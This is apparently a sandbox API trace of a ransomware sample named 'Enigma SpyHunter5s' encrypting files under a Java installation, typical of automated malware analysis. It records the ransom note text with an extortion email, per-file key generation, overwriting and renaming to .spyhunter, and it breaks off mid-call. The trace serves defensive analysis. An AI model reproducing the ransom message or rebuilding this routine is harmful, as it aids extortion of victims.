[0167.381] GetProcessHeap () returned 0x2c0000 [0167.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33dbd0 | out: hHeap=0x2c0000) returned 1 [0167.381] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.382] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0167.382] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce4eb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce614, lpOverlapped=0x0 | out: lpBuffer=0x25ce4eb*, lpNumberOfBytesWritten=0x25ce614*=0x127, lpOverlapped=0x0) returned 1 [0167.383] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0167.383] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce614, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce614*=0x2ac, lpOverlapped=0x0) returned 1 [0167.383] CloseHandle (hObject=0xb0) returned 1 [0167.383] GetProcessHeap () returned 0x2c0000 [0167.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea83f8 | out: hHeap=0x2c0000) returned 1 [0167.383] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.384] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0167.384] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce4e7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce610, lpOverlapped=0x0 | out: lpBuffer=0x25ce4e7*, lpNumberOfBytesWritten=0x25ce610*=0x127, lpOverlapped=0x0) returned 1 [0167.385] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0167.385] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce610, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce610*=0x2ac, lpOverlapped=0x0) returned 1 [0167.385] CloseHandle (hObject=0xb0) returned 1 [0167.385] GetProcessHeap () returned 0x2c0000 [0167.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec50b0 | out: hHeap=0x2c0000) returned 1 [0167.385] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5b0 | out: pbBuffer=0x25ce5b0) returned 1 [0167.386] GetProcessHeap () returned 0x2c0000 [0167.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.386] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5a8*=0x30) returned 1 [0167.386] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\zoneinfomappings"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.387] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings") returned 60 [0167.387] StrStrW (lpFirst="ZoneInfoMappings", lpSrch=".txt") returned 0x0 [0167.387] GetProcessHeap () returned 0x2c0000 [0167.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.387] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce56c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce56c*=0x2800, lpOverlapped=0x0) returned 1 [0167.389] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.389] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce56c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce56c*=0x2800, lpOverlapped=0x0) returned 1 [0167.389] GetProcessHeap () returned 0x2c0000 [0167.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.389] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.390] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce56c, lpOverlapped=0x0 | out: lpBuffer=0x25ce5ac*, lpNumberOfBytesWritten=0x25ce56c*=0x4, lpOverlapped=0x0) returned 1 [0167.390] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce56c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce56c*=0x30, lpOverlapped=0x0) returned 1 [0167.390] CloseHandle (hObject=0xb0) returned 1 [0167.390] GetProcessHeap () returned 0x2c0000 [0167.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.390] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings.spyhunter") returned 70 [0167.390] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\zoneinfomappings"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\ZoneInfoMappings.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\zoneinfomappings.spyhunter")) returned 1 [0167.391] GetProcessHeap () returned 0x2c0000 [0167.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.391] GetProcessHeap () returned 0x2c0000 [0167.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.391] GetProcessHeap () returned 0x2c0000 [0167.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4fe8 | out: hHeap=0x2c0000) returned 1 [0167.391] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5a8 | out: pbBuffer=0x25ce5a8) returned 1 [0167.392] GetProcessHeap () returned 0x2c0000 [0167.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.392] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5a0*=0x30) returned 1 [0167.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\wet"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.392] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET") returned 47 [0167.393] StrStrW (lpFirst="WET", lpSrch=".txt") returned 0x0 [0167.393] GetProcessHeap () returned 0x2c0000 [0167.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.393] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce564, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce564*=0x42c, lpOverlapped=0x0) returned 1 [0167.422] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffbd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.422] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x42c, lpNumberOfBytesWritten=0x25ce564, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce564*=0x42c, lpOverlapped=0x0) returned 1 [0167.422] GetProcessHeap () returned 0x2c0000 [0167.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.423] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.423] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce564, lpOverlapped=0x0 | out: lpBuffer=0x25ce5a4*, lpNumberOfBytesWritten=0x25ce564*=0x4, lpOverlapped=0x0) returned 1 [0167.423] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce564, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce564*=0x30, lpOverlapped=0x0) returned 1 [0167.423] CloseHandle (hObject=0xb0) returned 1 [0167.423] GetProcessHeap () returned 0x2c0000 [0167.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.423] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET.spyhunter") returned 57 [0167.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\wet"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\wet.spyhunter")) returned 1 [0167.424] GetProcessHeap () returned 0x2c0000 [0167.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.425] GetProcessHeap () returned 0x2c0000 [0167.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.425] GetProcessHeap () returned 0x2c0000 [0167.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33db28 | out: hHeap=0x2c0000) returned 1 [0167.425] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5a8 | out: pbBuffer=0x25ce5a8) returned 1 [0167.425] GetProcessHeap () returned 0x2c0000 [0167.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.425] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce5a0*=0x30) returned 1 [0167.425] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.426] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8") returned 56 [0167.426] StrStrW (lpFirst="PST8", lpSrch=".txt") returned 0x0 [0167.426] GetProcessHeap () returned 0x2c0000 [0167.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.426] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce564, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce564*=0x1b, lpOverlapped=0x0) returned 1 [0167.427] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.427] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce564, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce564*=0x1b, lpOverlapped=0x0) returned 1 [0167.427] GetProcessHeap () returned 0x2c0000 [0167.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.428] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.428] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce564, lpOverlapped=0x0 | out: lpBuffer=0x25ce5a4*, lpNumberOfBytesWritten=0x25ce564*=0x4, lpOverlapped=0x0) returned 1 [0167.428] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce564, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce564*=0x30, lpOverlapped=0x0) returned 1 [0167.428] CloseHandle (hObject=0xb0) returned 1 [0167.428] GetProcessHeap () returned 0x2c0000 [0167.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0167.428] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8.spyhunter") returned 66 [0167.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\PST8.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\pst8.spyhunter")) returned 1 [0167.429] GetProcessHeap () returned 0x2c0000 [0167.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0167.429] GetProcessHeap () returned 0x2c0000 [0167.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.430] GetProcessHeap () returned 0x2c0000 [0167.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea80f8 | out: hHeap=0x2c0000) returned 1 [0167.430] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5a0 | out: pbBuffer=0x25ce5a0) returned 1 [0167.430] GetProcessHeap () returned 0x2c0000 [0167.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.430] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce598*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce598*=0x30) returned 1 [0167.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7mdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.431] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT") returned 59 [0167.431] StrStrW (lpFirst="MST7MDT", lpSrch=".txt") returned 0x0 [0167.431] GetProcessHeap () returned 0x2c0000 [0167.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.431] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce55c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce55c*=0x8f0, lpOverlapped=0x0) returned 1 [0167.444] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff710, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.444] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x25ce55c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce55c*=0x8f0, lpOverlapped=0x0) returned 1 [0167.444] GetProcessHeap () returned 0x2c0000 [0167.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.444] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.444] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce59c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce55c, lpOverlapped=0x0 | out: lpBuffer=0x25ce59c*, lpNumberOfBytesWritten=0x25ce55c*=0x4, lpOverlapped=0x0) returned 1 [0167.444] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce55c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce55c*=0x30, lpOverlapped=0x0) returned 1 [0167.444] CloseHandle (hObject=0xb0) returned 1 [0167.445] GetProcessHeap () returned 0x2c0000 [0167.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.445] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT.spyhunter") returned 69 [0167.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7mdt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\MST7MDT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\mst7mdt.spyhunter")) returned 1 [0167.446] GetProcessHeap () returned 0x2c0000 [0167.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.446] GetProcessHeap () returned 0x2c0000 [0167.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.446] GetProcessHeap () returned 0x2c0000 [0167.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8038 | out: hHeap=0x2c0000) returned 1 [0167.446] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce5a0 | out: pbBuffer=0x25ce5a0) returned 1 [0167.446] GetProcessHeap () returned 0x2c0000 [0167.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.446] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce598*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce598*=0x30) returned 1 [0167.446] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\hst10"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0167.447] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10") returned 57 [0167.447] StrStrW (lpFirst="HST10", lpSrch=".txt") returned 0x0 [0167.447] GetProcessHeap () returned 0x2c0000 [0167.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0167.448] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce55c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce55c*=0x1b, lpOverlapped=0x0) returned 1 [0167.449] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.449] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25ce55c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce55c*=0x1b, lpOverlapped=0x0) returned 1 [0167.449] GetProcessHeap () returned 0x2c0000 [0167.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0167.449] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.449] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce59c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce55c, lpOverlapped=0x0 | out: lpBuffer=0x25ce59c*, lpNumberOfBytesWritten=0x25ce55c*=0x4, lpOverlapped=0x0) returned 1 [0167.449] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce55c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce55c*=0x30, lpOverlapped=0x0) returned 1 [0167.449] CloseHandle (hObject=0xb0) returned 1 [0167.449] GetProcessHeap () returned 0x2c0000 [0167.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0167.449] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10.spyhunter") returned 67 [0167.449] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\hst10"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\HST10.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\hst10.spyhunter")) returned 1 [0167.450] GetProcessHeap () returned 0x2c0000 [0167.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0167.450] GetProcessHeap () returned 0x2c0000 [0167.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0167.450] GetProcessHeap () returned 0x2c0000 [0167.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7eb8 | out: hHeap=0x2c0000) returned 1 [0167.451] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce598 | out: pbBuffer=0x25ce598) returned 1 [0167.451] GetProcessHeap () returned 0x2c0000 [0167.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0167.451] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce590*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce590*=0x30) returned 1 [0167.451] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT" (normalized: 